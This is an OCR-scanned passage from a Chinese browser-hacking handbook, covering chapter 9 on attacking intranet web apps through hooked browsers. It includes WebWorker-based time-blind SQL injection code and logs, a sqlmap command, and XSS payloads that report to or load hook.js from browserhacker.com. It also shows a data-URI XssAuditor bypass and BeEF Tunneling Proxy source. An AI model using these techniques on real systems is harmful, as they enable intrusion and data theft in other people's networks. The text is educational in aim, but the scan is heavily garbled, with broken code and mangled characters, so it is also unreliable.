{" + (end-start)/1000 + "] sec 


/* 生成 WebWorker， 处 理 从 'start' 位 置 取得 的 数据 */ 
function spawnWorkers(start, end) { 


for(var i=start; i<=end; 


i++) { 


// 4 Mevali) A 4) #WebWorker ES 
eval ("var w" + i + " = new Worker('" + wwloc + "');"); 


/* 从 WebWorker 取 得 消息 后 ， 检 查 从 哪个 位 置 获得 了 哪个 字符 ， 
并 将 其 添加 到 dbname 数 组 。 如 果 消 息 包 念 'end'， 

说 明 WebWorker 在 检查 范围 ('dataLength') 之 外 的 位 置 */ 

eval("w" + i + ".onmessage = function(oEvent){" + 

"var c = oEvent.data['char'];var p = oEvent.data['posi 


"workersDone++;" + 


"if (oEvent.data['end']) {if (dataLength== 
"if(dataLength !=0 && dataLength > 


onds."); 


tion'];" + 


) {dataLength=p-1;}; " + 
(p-1) ) {dataLength=p-1;};}else{" + 


"successfulWorkersDonet++;" + 
" console.log('Retrieved char ['+c+'] at position ['+p+']');" + 
"dbname[p]=c; console.log('Workers done [' + workersDone + ']." + 
" DataLength ['+dataLength+']');}}; "); 

eval ("var data = ('uri':'" + uri + "', 'port':" + port + 
", 'path':'" + path +"', 'payload':'" + payload + 


"', 'index':0,'seconds' 


:" + timeDelay + ",'position' 


eval ("w" + i + ".postMessage(data);"); 


position++; 
} 
} 


/* 每 N 秒 ('checkCompleteDelay' 中 定义 ) 
检查 一 次 WebWorker 是 否 完成 ,均匀 地 生成 它们 ， 或 调用 finish() */ 


function checkComplete() { 


if (workersDone == workers_number) { 


console.log("Successful workers done 


/* 所 有 生成 的 WebWorker 都 完成 ， 检 查 是 否 到 了 dataLength 
或 者 还 需要 再 继续 生成 ，dataLength== 


表明 还 需要 标识 待 取得 数据 的 长 度 */ 
if((dataLength != 0 && successfulWorkersDone !=0) 
&& successfulWorkersDone == dataLength) { 


console.log("Finishing..."); 
clearInterval (checkCompleteInterval) ; 


finish(); 

}else{ 

// 生成 新 WebWorker 

console.log("Spawned other [" + workers number + "] 
workersDone = 0; 


spawnWorkers (position, 


} 


position-« (workers number-1)); 


2" 4 od + "j;"); 


{"+successfulWorkersDone+"]"); 


workers."); 
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Jelse{ 
console.log("Waiting for workers to complete..." + 
"Successful workers done ["+successfulWorkersDone+"]"); 
j 
} 


// 第 一 次 调用 


spawnWorkers (position, workers_number) ; 


var checkCompleteInterval = setInterval (function() { 
checkComplete()}, checkCompleteDelay) ; 


}else{ 
console.log("WebWorker not supported!"); 


j 

攻击 目标 是 位 于 内 网 172.16.37.149:8080 上 的 一 个 Web 应 用 。 根 据 每 次 访问 /资源 的 HTTP 响应 
时 间 总 小 于 0.2 秒 ， 可 以 放心 地 使 用 2 秒 的 延迟 (timeDelay 变 量 )。 并 行 WebWorker 默 认为 5 个 ， 
但 可 以 通过 workers_number 变 量 来 修改 。 每 个 WebWorker 执 行 的 代码 需要 从 加 载 控 制 右 代码 的 
同 源 加 载 ， 并 可 以 通过 wwloc 变 量 配置 。 

调用 spawnworkers () 会 初始 化 位 置 1 ( 因为 要 检索 数据 库 名 称 的 第 一 个 字符 )， 并 创建 5 个 
WebWorker。 每 个 WebWorker 分 别 负责 检索 指定 位 置 的 字符 。 第 一 个 检索 位 置 1 ,第 二 个 检索 位 置 
2， 以 此 类 推 。 与 此 同时 ，checkcomplete() 函数 每 秒 钟 都 会 被 调用 一 次 。 这 个 函数 负责 检查 有 
多 少 个 WebWorker 成 功 完 成 了 任务 ， 以 及 是 否 找 出 了 数据 库 名称 的 最 后 一 个 字符 。 

确定 要 检索 数据 长 度 的 一 个 方法 ， 是 同 带 外 发 送 7 个 请 求 ， 并 检查 这 些 请 求 是 否 延 迟 了 。 
MSSQL 不 允许 数据 库 名 称 中 出 现 空 字符 , 因此 这 个 过 程 就 更 直观 了 。 对 于 名 为 sql_InjEction 1234 
的 数据 库 ， 长 度 就 是 18 ， 因 此 如 果 检 索 位 置 19 的 全 部 7 个 请 求 都 没有 延迟 ， 则 说 明 已 经 到 达 数 据 
ARIE 

在 aataLength 已 知之 前 ， 会 不 断 生 成 新 的 WebWorker。 而 在 aataLength 确 定 且 所 有 工作 
进程 全 部 完成 后 ， 用 来 调用 checkcomplete O 的 时 间 间 隔 会 被 清除 ， 之 后 数据 库 名 的 值 会 被 重 
建 出 来 。 数 组 abname 里 保存 着 十 进 制 形 式 的 所 有 检索 到 的 字符 ， 只 要 迭代 一 遍 并 调用 String . 
fromCharCode (char), ， 就 可 以 得 到 它们 的 字符 串 表 示 。 这 个 任务 由 finisph O 函数 执行 。 

图 9-13 展 示 了 这 个 基准 响应 时 间 0.2 秒 、 延 迟 时 间 2 秒 、 并 行使 用 5 个 工作 进程 的 技术 执行 之 后 
的 结果 。 只 用 了 44 秒 ， 就 获取 了 数据 库 名 称 。 
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€ > C D browserhacker.com/time-based -based-byte-inference.html 








e cuve Resources Network Sources Timeline Profiles Audits | Console | 


is not "alowed by Accéss-Control- “Allow-Origin. 

© XMLHttpRequest cannot load http://172.16.37.149:8080/?book_id=1%2@IF (UNICODE (SUBSTRING ( (SELECT%2@ISNUL... 
ASSS20NVARCHAR( 4000) ) , CHAR(32) ) ) , 16, 1) )%3E49)%2QWAITFOR%2@DELAY%20'@:0:2'—. Origin http://browserhacker.com 
is not allowed by Access—Control-Allow-Origin. 

Retrieved char [50] at position [16] 
Workers done [3]. DataLength [18] 

© Uncaught Error: NETWORK_ERR: XMLHttpRequest Exception 101 worker. js:58 

© XMLHttpRequest cannot load http://172.16.37.149:8080/?book_id=1%2@I1F (UNICODE (SUBSTRING ( (SELECT%2@ISNUL... 
AS*S20NVARCHAR( 4000) ) , CHAR(32) ) ) , 17, 1) )%3E51)%2@WAITFOR%2@DELAY%20'@:0:2'—-. Origin http://browserhacker.com 
is not allowed by Access-Control-Allow-Origin. 

Retrieved char [51] at position [17] 
Workers done [4]. DataLength [18] 

@ Uncaught Error: NETWORK ERR: XMLHttpRequest Exception 101 worker, 5:58 
Waiting for workers to complete...Successful workers done [17] time-based-byte-inference.html:92 
Waiting for workers to complete...Successful workers done [17] ime- = -i H 

© XMLHttpRequest cannot load http://172.16.37.149:8080/?book id-1«20IF(UNICODE(SUBSTRING( (SELECT%2@ISNUL... 
ASX20NVARCHAR( 4000) ) , CHAR(32) ) ) , 18, 1) )&3E51)&20WAITFOR20DELAYx20'0:0:2'—. Origin http://browserhacker.com 
is not allowed by Access-Control-Allow-Origin. 


Retrieved char [52] at position [18] 
Workers done [5]. DataLength [18] 
@ Uncaught Error: NETWORK ERR: XMLHttpRequest Exception 101 
Successful workers done [18] 
Finishing... 
Database name is: sql InjEction 1234 tXime-based-byte-inference,html:39 
Total time [44.043] seconds. time-based-byte-inference,html;41 





图 9-13 5 个 工作 进程 在 Chrome 中 取得 了 数据 库 名 称 
而 使 用 10 个 工作 进程 执行 相同 的 任务 花 了 30 秒 ， 如 图 9-14 所 示 。 








YC? * Console- HTML CSS Script DOM Net Cookies 


iè Clear Persist Profile All Errors Warnings Info Debug Info Cookies 
> GET http://172.16.37.149:8080 /?book_id= 1%20IF(UNICOD...), 18,1))%3ES 1)%20WAITFOR%20DELAY%20%270:0:2%27-- 200 OK — 2.01s 











Retrieved char [S1] at position [17] time-b..ce.html (line 52) 
Workers done [6]. DataLength [18] time-b..ce.html (line 52) 
Waiting for workers to complete...Successful workers done [14] time-b..ce.html (line 93) 


> GET http://172.16.37.149:8080/?book id» 1%20IF(UNICOD...,13,1))%3E1 10)%20WAITFOR%20DELAY%20%270:0:2%27-- 2000K 9ms 

* GET http://172.16.37.149:8080/?book id- 1%20IF(UNICOD...,13,1))%3E109)%20WAITFOR%20DELAY%20%270:0:2%27-- 200 OK — 2.01s 
> GET http://172.16.37.149:8080/?book id» 1%20IF(UNICOD...,12,1))%3E1 10)%20WAITFOR%20DELAY%20%270:0:2%27-- 200 OK — 2.01s 
> GET http://172.16.37.149:8080 /?book_id=1%20IF(UNICOD...),14,1))%3E94)%20WAITFOR%20DELAY%20%270:0:2%27-- 200 OK 2.01s 








Waiting for workers to complete...Successful workers done [14] time-b..ce.html (line 93) 
Retrieved char [52] at position [18] time-b..ce.html (line 52) 
Workers done [7]. DataLength [18] time-b..ce.html (line 52) 
Waiting for workers to complete...Successful workers done [15] time-b...ce.html (line 93) 
Retrieved char [110] at position [13] time-b..ce.html (line 52) 
Workers done [8]. DataLength [18] time-b..ce.html (line 52) 
> GET http://172.16.37.149:8080/?book_id=1%20IF(UNICOD...,12,1))%3E111)%20WAITFOR%20DELAY%20%270:0:2%27-- 200 OK — 10ms 

> GET http://172.16,37.149:8080/?book_id=1%20IF(UNICOD...), 14,1))%3E95)%20WAITFOR%20DELAY%20%270:0:2%27-- 2000K — 9ms 
Retrieved char [111] at position [12] time-b..ce.html (line 52) 
Workers done [9]. DataLength [18] time-b..ce.html (line 52) 
Retrieved char [95] at position [14] time-b..ce.html (line 52) 
Workers done [10]. DataLength [18] time-b..ce.html (line 52) 
Successful workers done [18] time-b..ce.html (line 75) 
Finishing... time-b..ce.html (line 82) 
Database name is: sql InjEction 1234 time-b..ce.html (line 39) 
Total time [30.063] seconds. time-b..ce.html (line 41) 





图 9-14 10 个 工作 进程 在 Firefox 中 取得 了 数据 库 名 称 


使 用 与 前 面 跨 域 示 例 一 样 的 时 间 延 公设 置 ， 启 动 Sqlmap， 结 果 花 了 差不多 140 秒 才 取 得 了 相 
同 的 结果 : 
./sqimap.py -u "http://172.16.37.149:8080/?book id-1" 
-p book id --dbms "mssql" --technique T --time-sec-2 
-v 3 --current-db --threads 5 


[19:53:56] [DEBUG] performed 151 queries in 139.56 seconds 
current database: 'sql_InjEction_1234' 


尽管 指定 了 5 个 线程 ， 但 Sqlmap 会 在 处 理 基于 时 间 的 SQL 盲 注 时 禁用 多 线程 。 因 此 所 有 请 求 
实际 上 是 按 顺序 发 送 的 。 
此 外 , 如 果 你 控制 了 一 个 内 网 浏览 器 , 同时 在 攻击 一 个 内 网 Web 应 用 , 那么 通信 延迟 会 减少 
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而 可 靠 性 会 提高 。 这 意味 着 你 可 以 缩短 SQL 中 的 时 间 延 迟 ， 同 时 还 可 以 在 发 现 漏洞 和 获取 数据 上 
取得 更 好 的 效果 。 

以 此 为 基础 ， 甚 至 还 可 以 把 向 同一 个 目标 发 送 请 求 的 任务 拆 分 开 ， 分 发 到 多 个 勾 连 浏览 
然后 在 服务 器 端 把 浏览 器 返回 的 数据 重建 起 来 。 这 种 分 布 式 的 、 基 于 时 间 的 SQL 注入 示例 的 完整 
代码 可 以 在 这 里 找到 : https://browserhacker.com. 

本 节 探 讨 了 利用 SQL 注入 漏洞 的 技术 。 接 下 来 要 看 一 看 XSS 漏 洞 ， 以 及 如 何在 浏览 器 中 利用 
它们 。 











9.7.2 检测 XSS 漏洞 


XSS 漏 洞 在 第 2 章 中 分 析 过 ， 同 时 也 给 出 了 现实 中 的 例子 。 本 节 将 完全 从 勾 连 浏览 髓 的 角度 
来 介绍 如 何 检测 XSS 漏 洞 。 

1. 跨 域 Blind XSS 检 测 

在 跨 域 的 情况 下 ， 要 检测 XSS 漏 洞 需要 执行 两 个 操作 : 一 个 是 发 送 攻击 指令 ， 另 一 个 是 确定 
攻击 是 否 成 功 。 

在 发 现 了 前 几 小 节 用 的 URL http://192.168.1.1/chapter?id=1 之 后 , 下 一 步 是 检查 id 参 数 是 否 存 
在 XSS 漏 洞 。 为 此 ， 先 把 这 个 URL 加 载 到 一 个 内 山 框 架 中 ， 然 后 给 这 个 参数 追加 一 个 经 典 的 XSS 
字符 串 值 。 结 果 类 似 如 下 所 示 : 


<iframe src="http://192.168.1.1/chapter?id=1 
$3Cscript%3Ealert (1) S3C%2Fscript%3E"> 


当 这 个 内 艇 框架 添加 到 勾 连 页 面 的 DOM 中 之 后 ， 就 会 加 载 跨 域 URL。 无 论 该 资源 存在 反射 
型 XSS 漏 洞 还 是 存储 型 XSS 漏 洞 ， 都 会 弹出 一 个 窗口 来 。 显 然 ， 还 需要 通过 某 种 方式 知晓 XSS 向 
量 是 否 被 触发 了 。 EAA ESR BE A SAME OTT, 所 以 你 无 法 直接 看 到 弹出 的 窗口 。 事实 上 ， 
受害 者 反而 会 看 到 它 。 如 果 你 的 目标 里 有 人 非常 敏感 ， 那 你 肯定 不 愿意 他 的 眼前 出 现 这 个 窗口 ! 
通过 在 内 艇 框架 中 加 载 资 源 以 识别 XSS 漏 洞 的 想法 ,是 由 Gareth Heyes 在 2009 年 推 而 广 之 的 ， 
当时 是 通过 他 写 的 XssRays”。XssRays 是 一 个 纯粹 的 JavaScript XSS 扫 描 器 。 简 单 来 说 ，XssRays 












































































































































会 取得 一 个 网 页 中 的 所 有 链接 和 表单 ， 并 在 这 些 资源 路 径 及 其 参数 的 后 面 添 加 XSS 向 量 , 然后 通 
过 内 骸 框 架 加 载 它们 。 





2009 年 ， 即 使 是 在 跨 域 的 情况 下 ， 子 框架 也 是 可 以 使 用 URI 片 段 标 识 符 ( # ) 与 父 框架 通信 
No 今天， 所 有 现代 浏览 器 都 已 经 消除 了 这 个 漏洞 。 事 实 上 ， 我们 可 以 把 它 归结 为 一 种 违反 SOP 
的 行为 ， 因 为 根据 SOP， 加 载 到 内 骨 框 架 中 的 跨 域 资源 是 不 应 该 可 以 与 其 顶级 窗口 通信 的 。 

由 于 XssRays 是 完全 用 JavaScript 写 的 ， 所 以 它 可 以 直接 在 匀 连 浏览 器 中 使 用 。 现 代 浏 览 器 中 
的 旧 XssRays 逻 辑 是 可 以 利用 的 ， 只 需 把 原来 使 用 打 了 补丁 的 绕 过 片段 标识 符 的 地 方 奉 换 掉 。 新 
的 payload 必 须 更 完善 ， 对 SOP 更 友好 。 换 句 话 说， 就 是 在 发 现 XSS 漏 洞 时 ， 需 要 在 不 触犯 SOP 的 
情况 下 通知 到 攻击 者 。 

新 payload 把 内 网 框架 的 位 置 改 成 了 攻击 者 知道 的 资源 ， 比 如 你 的 服务 器 上 的 一 个 处 理 程序 。 
继续 前 面 的 例子 ， 此 时 的 新 向 量 应 该 是 类 似 这 样 的 : 
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«iframe src="http://192.168.1.1/chapter?id=1%3Cscript%3Elocation%3D'http%3A 
S2F%2Fbrowserhacker.com%2Fxssrays%3Fdetails%3D....'%3C%2Fscript%3E"> 





如 果 攻 击 成 功 执行 ， 就 会 创建 一 个 指向 http:/browserhacker.com/xssrays 资 源 的 GET 请 求 ， 包 
括 XSS 漏 洞 的 细节 信息 。 这 种 方式 可 以 避免 误 报 ， 因 为 服务 器 上 的 处 理 程序 在 指令 被 执行 的 情况 
下 ， 只 会 收 到 GET 请 求 。 而 只 有 在 漏洞 被 利用 了 的 情况 下 ， 才 可 能 发 送 这 个 通知 。 

对 XssRays 的 改进 包含 在 BeEF 中 ， 其 煞 辑 可 以 被 注入 勾 连 浏览 句 ， 以 检测 同 源 或 跨 域 XSS 漏 
洞 。 图 9-15 展 示 了 BeEF 中 的 XssRays 的 工作 架构 。 




















<- POLLING 
START XSSRaAYS 本 -一 -一 -一 一 -一 一 一 一 一 人 Hooked 
(Timeout: 5000 F SERVING COMMANDS .-- > Domain 
CROSSDOMAIN: TRUE) _ Tm 
VICTIM 

La SERVE XSSRAYS MAIN EXAMPLE.COM 
JS TO THE VICTIM 
- = XSSRAYS LOADED 

BEEF OWNER IN THE DOM 
CRAWL LINKS AND FORMS IN THE HOOKED 

PAGE OF DOMAIN EXAMPLE.COM 


(ATTACKER) 


LOAD PREVIOUSLY ENUMERATED RESOURCES IN 
HIDDEN IFRAMES, INCLUDING CROSS-DOMAIN 
RESOURCES 


HOOKED PAGE 


GET /XSSRAYS/RAYS7SESS= 123..<ATTACK_INFO> <A HREF="/PAGE 1 7NAME=TEST"... 
HOST: BEEF_SERVER A 


IFRAME 1 
IFRAME 2 
IFRAME 3 


<FORM ACTION="/PAGE4"... 
<A HREF "EXT.COM/PAGEZ7MAIL7 BLA" 
THE ATTACKER CAN NOW TRICK THE VICTIM TO 
LOAD HTTPI/EXT.COM/PAGEZ?MAIL- 1"» <SCRIPT 
SRC-'BEEF-HOOK'» </SCRIPT> <IFRAME ID="IFRAME 3" SRO="EXT.COM/PAGE2? 
MAIL BLA'? <SCRIPT>DOCUMENT.LOCATION-HREF=" 
«BEEF-RESDOURCEP"X/scRnIiPT»" 


IFRAME 3 IS RENDERED: IF THE MAIL PARAMETER 
€ IS VULNERABLE TO X88, THE ATTACK VECTOR 
WHEN TRIGGERED WILL CONTACT BACK BEEF 
ATP BüMFADE ANGE NOTE: THE ORIGINAL XSSRAYS VERSION (0.5.5, 
2009) FROM GARETH HEYES WAS USING A NICE TRICK 
(LOCATION.HASH) TO COMMUNICATE BETWEEN PARENT/ 
CHILO IFRAMES. NOWADAYS THIS HAS BEEN PATCHED. 
THIS IS WHY WE'RE USING THE LOCATION.HREF TRICK TOJ 
CHECK FOR CROSS-DOMAIN VULNERABLE RESOURCES. 


图 9-15 XssRays 的 高 层 构 架 


XSSRAYS IS PARTICULARLY EFFECTIVE WHEN 
USED IN INTRANET EXPLOITATION USING BEEF. 








XssRays 当 然 可 以 用 于 检测 同 源 XSS 漏 洞 。 但 是 , 由 于 在 同 源 的 情况 下 根本 没有 SOP 限 制 , 所 
以 其 实用 价值 也 会 打 些 折扣 。 而 且 对 于 基础 设施 而 言 ， 同 源 的 XSS 漏 洞 未 必 更 有 价值 。 

如 果 能 够 扩大 攻击 面 ， 则 跨 域 XSS 漏 洞 检测 的 用 处 会 更 大 。 对 于 不 能 在 互联 网 上 路 由 到 的 
Web 服 务 器 的 间接 的 XSS 漏 洞 利用 ， 对 你 而 言 是 非常 有 价值 的 。 因 为 新 的 攻击 目标 很 可 能 被 其 组 
织 假定 为 是 外 网 无 法 访问 的 ， 所 以 很 可 能 不 会 对 其 采取 严密 的 安全 防范 措施 。 

如 果 能 找到 跨 域 资源 中 的 XSS 漏 洞 ， 就 无 法 阻止 你 在 该 资源 的 环境 中 勾 连 浏览 天 了 。 根据 需 
求 不 同 ， 可 以 把 资源 加 载 至 已 勾 连 页 面 中 的 隐藏 的 内 嵌 框 架 ， 也 可 以 像 第 3 章 讨论 的 那样 打开 一 
个 新 的 弹出 窗口 ( 可 以 在 当前 窗口 上 面 ， 也 可 以 在 当前 窗口 底下 )。 后面 几 小 节 会 介绍 如 何 勾 连 
新 发 现 的 源 。 

检测 跨 域 XSS 漏 洞 的 另 一 个 优势 ， 是 可 以 隐藏 你 的 互联 网 卫 地 址 。 资 源 并 不 是 在 攻击 者 的 机 
需 上 加 载 ， 而 是 在 被 匀 连 的 浏览 器 上 加 载 。 因 此 ， 攻 击 目标 的 卫 地 址 才 会 被 记录 到 Web 应 用 的 日 
志 中 。 别 忘 了 ， 这 个 特点 是 所 有 通过 勾 连 浏览 器 实施 的 攻击 所 共有 的 ， 而 这 正 是 发 动 ( 大 多 数 ) 
匿名 攻击 的 关键 所 在 。 
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2. 跨 域 Blind XSS 利 用 
现在 , 你 已 经 在 内 部 网 络 上 通过 勾 连 浏览 絮 勾 连 了 一 个 源 。 假设 这 个 初始 源 是 可 以 通过 互联 
网 访问 的 。 你 又 检测 到 了 一 个 有 XSS 漏 洞 的 、 不 能 路 由 到 的 Web 应 用 。 那 么 下 一 步 ， 就 是 取得 这 
个 源 的 访问 权限 ， 而 这 一 步 实 际 上 很 简单 。 
说 来 简单 ,其 实 就 是 要 在 新 发 现 的 源 中 再 次 勾 连 一 个 源 。 这 里 需要 分 清 什么 是 勾 连 浏览 器 和 
色 连 源 , 勾 连 浏览 器 必须 至 少 有 一 个 勾 连 源 , 而 色 连 源 必须 至 少 有 一 个 色 连 浏览 絮 。 通常 情况 下 ， 
勾 连 浏览 妖 和 色 连 源 是 一 一 对 应 的 。 如 果 你 在 受害 者 浏览 右 中 色 连 了 一 个 源 , 就 说 明 你 既 勾 连 了 
一 个 浏览 器 ,又 勾 连 了 一 个 源 。 如 果 你 想 创 建 一 个 指向 其 他 源 的 勾 连 内 能 框架 ( 在 之 前 勾 连 源 的 
DOM 中 )， 那 么 你 可 能 在 同一 个 浏览 需 中 拥有 两 个 被 勾 连 的 源 。 当 然 ， 也 有 可 能 在 同一 个 源 上 勾 
连 两 个 或 多 个 浏览 器 。 使 用 框架 通过 XSS 漏 洞 勾 连 多 个 浏览 器 时 ， 就 会 发 生 这 种 情况 。 
下 面 开 始 介绍 如 何 色 连 新 源 。 继 续 前 面 XssRays 的 例子 ， 通 过 执行 下 面 两 行 JavaScript 代 码 ， 
就 可 以 在 BeEF 中 以 一 个 隐藏 的 内 区 框 架 勾 连 有 漏洞 的 源 http://192.168.1.1/chapter?id=1: 
var i = beef.dom.createInvisibleIframe(); 
i.setAttribute ( 
"Bre", 
"http://192.168.1.1/chapter?id=1"+ 
"<script src='http://browserhacker.com/hook.js'></script>"); 


利用 XSS 汤 洞 勾 连 新 源 之 后 ， 就 拥有 了 间接 的 访问 权限 。 因 为 新 源 无 法 路 由 到 ， 所 以 所 有 通 
信和 都 必须 通过 勾 连 浏览 器 中 转 。 这 种 对 源 的 盲 勾 连 ,让 攻击 者 能 够 实现 对 内 部 Web 应 用 的 访问 ， 
这 是 在 互联 网 上 实现 不 了 的 。 

现在 ， 可 以 利用 浏览 器 的 隧道 代理 ， 对 Web 服 务 器 发 动 进一步 攻击 。 后 面 的 内 容 将 更 加 详细 
地 介绍 相关 的 攻击 方法 。 

3. 绕 过 XSS 过 滤器 

大 多 数 现 代 浏 览 器 都 会 默认 实现 XSS 过 滤器 ， 这 种 机 制 会 导致 跨 域 勾 连 的 可 靠 性 降低 。 绕 过 
些 机 制 是 一 场 旷 日 持久 的 “上 暗 战 ?， 但 对 于 你 已 经 匀 连 的 浏览 器 而 言 ， 可 能 存在 一 种 方案 能 帮 
Chrome 的 过 滤器 (也 在 Safari 中 实现 了 ， 因 为 它们 都 使 用 WebKit 泻 染 引 擎 ) 叫 作 XssAuditor。 
这 个 过 滤 天 并 不 保护 用 户 免 受 通过 数据 URI 向 量 发 动 的 XSS 攻 击 之 害 。Mario Heiderich 在 2010 年 
向 Chrome 开 发 团队 报告 了 这 个 问题 *。 在 本 书写 作 时 ， 相 应 的 绕 行 方案 依然 有 效 。 

URI 模 式 data: 的 设计 意图 是 以 外 部 资源 的 形式 ， 在 HTML 页 面 中 包含 铭 入 数据 。 它 的 格式 是 
这 样 的 : 

data: [«MIME-type»][;charset-«encoding»][;base64],«data» 

WRA — S base642R ES TPNGIEL Fr, ASIA PA ASS URI A] BE EIR FEY : 


<img src-"data:image/png;base64,iVBORwOKGgoAAAANSUhEUSgAAAAUA \ 
AAAFCAYAAACNbyb1AAAAHE1EQVQI12P4//8/w38GIAXDIBKEODHxg1jNBAAO \ 
9TXLOY4OHWAAAABJRUS5ErkJggg=="> 


没有 什么 可 以 阻止 这 种 模式 里 包含 其 他 类 型 的 内 容 ， 比 如 可 以 使 用 text /html 类 型 的 字符 
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集 ， 然 后 以 base64 编 码 字符 串 <script>alert(1)</script>。 如 果 编 码 了 这 个 字符 串 ， 就 会 得 
到 下 面 的 数据 URI: 


<iframe src="data:text/html;base64, \ 
PHNJ cmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> 


BeEF 中 的 XssRays 对 Chrome 和 Safari 使 用 的 正 是 这 种 技术 。 下 面 的 JavaScript 代 码 说 明了 其 
逻辑 : 
if(beef.browser.isC() || beef.browser.isS()) { 
// 浏览 器 是 Chrome 或 Safari 
var datauri = btoa(url); 
iframe.src = "data:text/html;base64," + datauri; 
}else{ 


iframe.src = url; 


} 
知道 如 何 对 XSS 漏 洞 发 动 攻击 后 , 我 们 可 以 更 上 一 层 楼 。 下 一 节 会 介绍 利用 上 述 漏 洞 的 各 种 
方法 ， 以 达到 你 的 终极 目标 。 


9.8 通过 浏览 器 代理 


使 用 通配符 的 宽松 跨 域 策略 , 或 者 SOP 绕 行 技 术 , 可 以 让 我 们 把 勾 连 浏览 器 当 作 开放 的 HTTP 
代理 来 使 用 。 即使 不 可 以 绕 过 SOP 或 者 不 存在 配置 上 的 玻 漏 , 照样 可 以 通过 勾 连 浏览 器 代理 请 求 ， 
只 不 过 SOP 会 将 你 限制 在 当前 勾 连 源 。 在 通过 XSS 勾 连 了 一 个 源 ， 而 你 又 不 能 直接 访问 它 的 情况 
下 ， 这 还 是 有 用 的 。 关 于 绕 过 SOP 的 技术 ， 请 参见 第 4 章 。 
BeEF 的 Tunneling Prox 扩 展 在 127.0.0.1:6789 上 绑 定 了 一 个 服务 器 套 接 字 ， 可 以 解析 原始 的 
HTTP 请 求 。 下 面 的 代码 演示 了 其 部 分 功能 


def initialize 
@conf = BeEF::Core::Configuration.instance 
Gproxy server = TCPServer.new( 
Gconf.get('beef.extension.proxy.address'), 
@conf.get ('beef.extension.proxy.port') 


) 













































































loop do 
proxy = @proxy_server.accept 
Thread.new proxy, &method(:handle request) 
end 
end 


def handle request socket 
request line - socket.readline 


# HTTP 方 法 # 默认 为 GET 
method = request_line[/^\w+/] 


# HTTP 有 版 本 # 默认 为 1 .0 
version = request_line[/HTTP\/(1\.\d)\s*$/, 1] 
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version = "1.0" if version.nil? 


# url # 主机 : 端口 /路 径 
url = request_line[/*\w+\s+(\S+)/, 1] 


# É S UNRESERVED 
# 防止 攻击 时 发 生 URI 错 误 
tolerant parser = URI::Parser.new( 
:UNRESERVED => BeEF::Core::Configuration.instance.get( 
"beef.extension.requester.uri unreserved chars") 
) 


uri - tolerant, parser.parse(url.to s) 


raw request - request line 
content length = 0 


loop do 
line - socket.readline 


if line =~ /*Content-Length:\s+(\d+)\s*$/ 
content length - $1.to i 
end 


if line.strip.empty? 
# 读 取 套 接 字 中 的 数据 
# 长 度 为 <content_length> 
if content_length >= 0 
raw_request += "\r\n" + socket.read(content_length) 
end 
break 
else 
raw_request += line 
end 
end 
[ee sni Di] 
end 


发 送 到 该 服务 器 套 接 字 的 原始 HTTP 请 求 被 解析 后 ， 保 存在 BeEF 的 数据 库 中 。 另 一 个 组 件 会 
从 数据 库 中 检索 到 这 个 原始 请 求 的 数据 , 将 其 E 转换 后 的 请 求 随时 
可 以 通过 某 种 通信 渠道 , 被 注入 匀 连 浏览 器 的 DOM。 第 3 章 介 绍 过 , 可 选 的 通信 渠道 有 XHR 轮 询 、 
WebSocket 和 DNS。 

服务 器 端 组 件 Requester 会 将 正确 的 BeEF JavaScript API 调 用 注入 色 连 浏览 器 : 


def add_to_body (output) 
Gbody << %Q{ 
beef.execute(function() { 
beef.net.requester.send( 
#{output.to_json} 
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前 面 代码 中 的 变量 output 是 其 JSON 形 式 的 散 列 值 ， 包 含 需要 发 送 的 请 求 的 所 有 信息 。 这 些 

言 息 随后 作为 输入 参数 传递 给 beef .net .r quester.send 方 法 ,该 方法 会 为 requests_array 

数组 中 的 每 一 项 都 创建 一 个 XxMLHttpRequest 请 求 ， 然 后 调用 如 下 所 示 的 beef .net .forge_ 
request 方 法 : 


beef.net.requester = { 








handler: "requester", 


send: function(requests_array) { 
for (i in requests_array) { 
request = requests array[il; 


# 使 用 BeEF 的 forge_request API 及 必要 信息 创建 一 个 XHR 对 象 

beef.net.forge request('http', request.method, request.host, 
request.port, request.uri, null, request.headers, request.data, 
10, null, request.allowCrossDomain, request.id, function(res, 
requestid) { 


# 要 执行 的 回调 ， 把 XHR 响 应 数据 发 给 服务 器 

beef.net.send('/requester', requestid, { 
response_data: res.response_body, 
response_status_code: res.status_code, 
response_status_text: res.status_text, 
response_port_status: res.port_status, 
response headers: res.headers)); 














这 里 forge_request 的 最 后 一 个 输入 参数 是 一 个 匿名 函数 ， 会 在 forge_request 请 求 完 
成 后 作为 回调 函数 被 调用 。 调 用 结果 就 是 继续 调用 beef .net .send， 从 而 将 状态 、 首 部 和 响应 
体 等 XHR 响 应 信息 发 送 回 BeEF。 然 后 服务 器 会 去 掉 一 些 HTTP 响 应 首部 ， 主 要 是 缓存 和 编码 相 
关 的 字段 ， 然 后 调整 Content-length 啊 应 首部 。 之 所 以 要 进行 这 种 啊 应 的 规范 化 调整 ， 是 因为 最 
初 的 HTTP 啊 应 是 通过 XMLHttpRedquest 取 得 的 ， 而 且 可 能 包含 GZ 了 了 编码 首部 。 如 果 Tunneling 
Proxy MRA ae RAPA MS, 可 能 会 导致 Content-length 不 匹配 ,因为 勾 连 浏览 需 在 获得 XHR 响 应 
时 就 会 将 其 解码 。 

此 时 ， 规 范 化 的 原始 HTTP 响 应 就 可 以 被 发 回 到 套 接 字 ， 这 个 套 接 字 最 初 将 请 求 发 送 给 了 
BeEF 的 Tunneling Proxy 的 6789 端 口 。 根 据 BeEF 中 配置 的 轮 询 超 时 、 目 标 应 用 的 响应 时 间 ， 以 及 
勾 连 浏览 器 的 带宽 不 同 ， 接 收 响应 可 能 会 有 几 秒 钟 的 延迟 。 

图 9-16 展 示 了 Tunneling Proxy 内 部 的 架构 流程 
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AN 个 需要 被 发 送 到 攻击 目标 的 请 求 
beef.execute(function(){ 
beef.net.requester.send(<requests>) 


j Q -发 出 请 求 


一 al 一 ss 
-- 一 -- for(i in <requests>){ 
_ beef.net.forge_request(<request>, 
— wa 
5 peti een callback); 
ee 
= 


WO | gn 


= | Li 
(2700 T6789 | ”HTTP 网 应 被 发 回 到 BeEF 的 [i] 
M requester 处 理 程序 
beef.net.send('/requester', 
{<response>}); 


[| 
|| 
ji 
|| 
| | 


1 re 


browservictim.com 





图 9-16 ”BeEF 的 Tunneling Proxy 内 部 的 架构 流程 


为 了 最 大 限度 地 减少 延迟 ， 可 以 利用 BeEF 的 WebSocket 通 信和 汇 道 。 这 个 渠道 默认 是 禁用 的 ， 
因此 首先 要 启用 它 。WebSocket 是 一 个 流 协议 ， 比 默认 的 XHR 轮 询 速度 快 ， 但 只 有 在 勾 连 浏 览 
